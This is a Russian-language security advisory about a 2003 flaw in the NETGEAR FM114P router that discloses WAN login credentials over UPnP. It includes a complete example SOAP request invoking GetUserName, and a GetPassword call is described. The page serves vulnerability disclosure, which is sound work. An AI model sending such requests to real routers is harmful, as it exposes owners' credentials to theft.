Раскрытие пароля через UPNP в NETGEAR FM114P Wireless cable/DSL firewall router
| Дата публикации: | 09.04.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1296 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в NETGEAR FM114P Wireless cable/DSL firewall router. Устройство может раскрыть информацию авторизации удаленному пользователю, когда используется Universal Plug and Play (UPNP).
Как сообщается, удаленный пользователь может вызвать UPNP SOAP запрос (GetUserName, GetPassword), чтобы получить WAN имя пользователя и пароль с устройства. Пример:
POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
</s:Body>
</s:Envelope>
Уязвимость обнаружена в NETGEAR FM114P; Firmware 1.4 Beta Release 21
|
| Ссылки: | Another security problem in Netgear FM114P ProSafe Wireless Router firmware |